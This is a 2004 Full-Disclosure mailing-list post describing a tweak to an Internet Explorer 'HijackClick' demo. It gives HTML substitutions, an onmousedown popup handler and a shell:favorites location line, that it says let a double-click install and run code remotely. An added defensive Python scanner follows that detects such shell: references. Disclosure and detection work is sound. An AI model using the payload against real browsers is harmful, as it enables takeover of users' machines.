[Full-Disclosure] Brand New Hole: Internet Explorer: HijackClick 3

http-equivexcite.com
Date: Mon Jul 12 2004 - 14:13:12 CDT


Paul has posted a tantalizing demonstration to bugtraq today.

[see: http://www.securityfocus.com/archive/1/368652]

This Internet Explorer sure provides hours of free
entertainment. Let's install and run executable code on the
target computers for the hell of it. Paul's beautiful demo
tweaked as described below to do just that.

<!--

Microsoft just disabled those functions from
being called when the mouse button is down and called it
patched. No more hijackclick,
right?

Wrong.

-->

This is absolutely fantastic Paul, with a patented double-click
of the mouse we can remotely take over the target's computer:

Just substitute as follows:

1. <img src="greyhat.html" id=anch
onmousedown="parent.nsc.style.width=2000;parent.nsc.style.height=
2000;parent.pop.show(1,1,1,1);parent.setTimeout('showalert
()',3000);" style="width=168px;height=152px;background-image:url
('youlickit.gif');cursor:hand" title="click me!"></a>

2. location="shell:favorites\greyhat[1].htm"

Someone was querying the other day whether shell in Internet
Explorer poses a problem [despite repeated demonstrations].
Pah! Probably not.

Quick and Dirty Working Demo:

http://www.malware.com/paul.html

--
http://www.malware.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
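
Added example, not part of the original post: a defender-side scanner that flags `shell:` references such as the one in step 2 when they appear in HTML passing through a proxy or mail gateway. The attribute list, the function and class names, and the sample strings are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# URL-valued attributes to check (an assumed, non-exhaustive list).
URL_ATTRS = {"src", "href", "action", "data", "background"}
# shell: opening a quoted string in script text, e.g. location="shell:..."
SCRIPT_RE = re.compile(r"""["']\s*(shell:[^"']*)""", re.IGNORECASE)

def normalize(value):
    """Drop tab/CR/LF, which browsers ignore inside URLs, then trim."""
    return re.sub(r"[\t\r\n]", "", value).strip()

class ShellRefFinder(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []          # (location, value) pairs
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        self._in_script = self._in_script or tag == "script"
        for name, value in attrs:   # values arrive entity-decoded
            v = normalize(value or "")
            if name in URL_ATTRS and v.lower().startswith("shell:"):
                self.findings.append((f"<{tag} {name}>", v))
            elif name.startswith("on"):     # inline event handlers
                self._scan_script(f"<{tag} {name}>", v)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._scan_script("<script>", normalize(data))

    def _scan_script(self, where, text):
        for m in SCRIPT_RE.finditer(text):
            self.findings.append((where, m.group(1)))

def find_shell_refs(html):
    finder = ShellRefFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed samples: step 2's string in a script, an obfuscated href, a benign page.
SAMPLES = [
    '<script>location="shell:favorites\\greyhat[1].htm"</script>',
    '<a href="&#115;he\tll:favorites\\x.htm">x</a>',
    '<a href="http://example.com/shell:notes">ok</a><p>shell: text</p>',
]
```

Matching is done after entity decoding and whitespace stripping, so an encoded or tab-split scheme in an attribute is still caught, while `shell:` in ordinary page text or inside an `http:` URL path is not reported.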